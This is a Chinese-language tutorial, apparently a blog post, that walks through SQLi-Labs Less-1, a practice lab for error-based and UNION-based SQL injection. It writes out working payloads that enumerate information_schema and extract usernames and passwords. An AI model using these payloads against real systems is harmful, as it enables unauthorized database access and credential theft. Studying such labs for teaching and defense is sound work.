zoukankan      html  css  js  c++  java
  • less-1

    如果你是使用的phpstudy,请务必将sql的版本调到5.5以上,因为这样你的数据库内才会有information_schema数据库,方便进行实验测试。

    其次你需要在网上下载sqllibs

    另外在注入过程中:

    -- (这里有一个空格,--空格)在SQL内表示注释,但在URL中,如果在最后加上-- ,浏览器在发送请求的时候会把URL末尾的空格舍去,所以我们用--+代替-- ,原因是+在URL被URL编码后会变成空格

     首先介绍一下基础知识:

    url编码:一般的url编码其实就是那个字符的ASCII值得十六进制,再在前面加个%

    空格是%20,单引号是%27, 井号是%23,双引号是%22

    判断sql注入(显错和基于错误的盲注):单引号,and 1=1  和and 1=2,双引号,反斜杠,注释等

    sql 注入的基本步骤:

    (1)    判断是否存在注入,判断类型并且闭合语句

    (2)    Order by 判断字段数,

    (3)    选择注入语句,  union查询或者报错注入

    (4)     获取数据库用户,版本,当前连接的数据库等信息

    (5)     获取某个数据库表的信息获取列信息

    (6)     最后就获取数据了

    然后我们现在开始操作了!

    输入id=1可以看到用户名和密码,说明是可访问的。

    输一个id值,返回了name和password,接着测试是否能注入

    输入id=',发现报错了,直接报的数据库的错,对web浏览器用户透明,那么可以从报错中得到很多信息,比如这是个MySQL的数据库,还可以猜想到后台的sql语句,应该是“SELECT * FROM table_name WHERE id='$_get['id']' LIMIT 0,1”这种,说明他没有过滤单引号,并且id是char型的输入,之所以报错是因为用了单引号,导致后面的部分“'LIMT 0,1;”多余出来了

     

    构造url:直接在后面加个单引号(当然你要在后面先加?id=一个数字),单引号被自动url编码了

     

     

    发现报了sql语句的语法错误,那么应该存在sql注入,因为没过滤单引号

    输入d=1’ and 1=1--+ 访问正常,此时这里输入d=1 and 1=1是一样的,只是前者使用了注释符。由于and 1=1为真,所以页面应返回与id=1相同的结果,

    输入d=1’ and 1=2--+或者d=1 and 1=2错误,所以该sql注入是基于字符型的注入,页面应返回与id=1不同结果

     

     

    查询user表的字段数量,查询语句:id=1’ order by ()--+    

    这里后面之所以要用--+是因为这里我们的url在get方式提交的时候要进行一次url转码 所以我们要让转码后的字符为--+来闭合语句;()指你想要查询的数量,例如id=1’ order by 6--+表示查询第1个字段到第6个字段之间的数量,如果正确则有6个,甚至更多,往后面依次加1个慢慢试就可以了,如果错误,往前依次减1个就可以了。具体操作如下:

    输入id=1’ order by 3--+,显示正确,

    输入id=1’ order by 4--+,显示错误,如下图可以看到,查询不到第4个字段,所以只有3个字段

    系统数据库information_schema来获取表名,information_schema数据库中含有很重要的三张表:SCHEMATA,TABLES和COLUMNS

    SCHEMATA表中存储了MySQL中所有数据库的信息,包括数据库名,编码类型路径等,show databases的结果取之此表

    TABLES表中存储了MySQL中所有数据库的表的信息(当然,索引是根据数据库名的),包括这个表是基本表还是系统表,数据库的引擎是什么,表有多少行,创建时间,最后更新时间等,show tables from schemaname的结果取之此表

    COLUMNS表中存储了MySQL中所有表的字段信息,show columns from schemaname.tablename的结果取之此表

    在数据库中查询参数ID对应的内容,然后将数据库的内容输出到页面,将数据输出到页面上,由于是数据输出到页面上的,所以可以使用Union注入,且通过order by查询结果,由上面得到字段数为3,所以Union注入的语句如下所示:

    输入id=1' union select 1,2,3--+,可以看到页面成功执行,但是没有返回union select的结果,这是由于代码只返回第一条结果。

    可以设置参数id的值,让服务端返回union select的结果,例如我把id改为-1,这样数据库中就没有id=1的数据

    由上图我们可以看到,返回union select的结果2和3,意味着在union select 1,2,3中,2和3的位置可以输入sql语句,我这里在2的位置查询当前数据库名(使用database()函数)。

    输入id=-1’ union select1,database(),3--+如下图可看到页面成功返回数据库信息

    以上得知我们的数据库库名(security)后,接下来查询库名下的表名

    id=-1’ union select 1,(select table_name from information_schema.tables where table_schema='security' limit 0,1),3--+

    这里的limit 0,1表示查询的数据库库名(security)第一个字段的表名

    也可以查数据库库名(security)第二个字段的表名

    id=-1’ union select 1,(select table_name from information_schema.tables where table_schema='security' limit 1,1),3--+

    也可以查数据库库名(security)第四个字段的表名

    id=-1’ union select 1,(select table_name from information_schema.tables where table_schema='security' limit 3,1),3--+

    现在表名查询完了,就是我们已经知道库名和表名了,接下来我这里做的是查询security 库名中users表中的第二个字段名,还是在2的位置输入语句,注意括号不能少,

    输入id=-1’ union select 1,(select column_name from information_schema.columns where table_schema='security' and table_name=’users’ limit 1,1),3--+

    (这里我输入的是整个1,2,3)输出结果如下图所示。

    这里也可以获取users表中的第三个字段名,id=-1’ union select 1,(select column_name from information_schema.columns where table_schema='security' and table_name=’users’ limit 2,1),3--+

    当获取了库名、表名和字段名时,就可以构造SQL语句查询数据库的数据,我这里查询字段uers对应的第三个字段(password)的第一个字段的内容

    输入id=-1' union select 1,(select password from users limit 0,1 ),3--+

    还可以在3处把版本加上

    id=-1' union select 1,(select password from users limit 0,1 ),version()--+

    爆users里的字段usename和password值

    输入:id=-1’ union select 1,group_concat(usename),group_concat(password) from users--+

    以上就是我们通过sql语句注入来实现查询数据库、数据库中的表、数据库中表的字段以及数据库中表的字段的内容。

  • 相关阅读:
    1029: [JSOI2007]建筑抢修
    1028: [JSOI2007]麻将
    1050 棋盘染色 2
    1026: [SCOI2009]windy数
    1074: [SCOI2007]折纸origami
    839. Optimal Marks
    1024: [SCOI2009]生日快乐
    1025: [SCOI2009]游戏
    1023: [SHOI2008]cactus仙人掌图
    对前面的总结
  • 原文地址:https://www.cnblogs.com/xixi3/p/12068041.html
Copyright © 2011-2022 走看看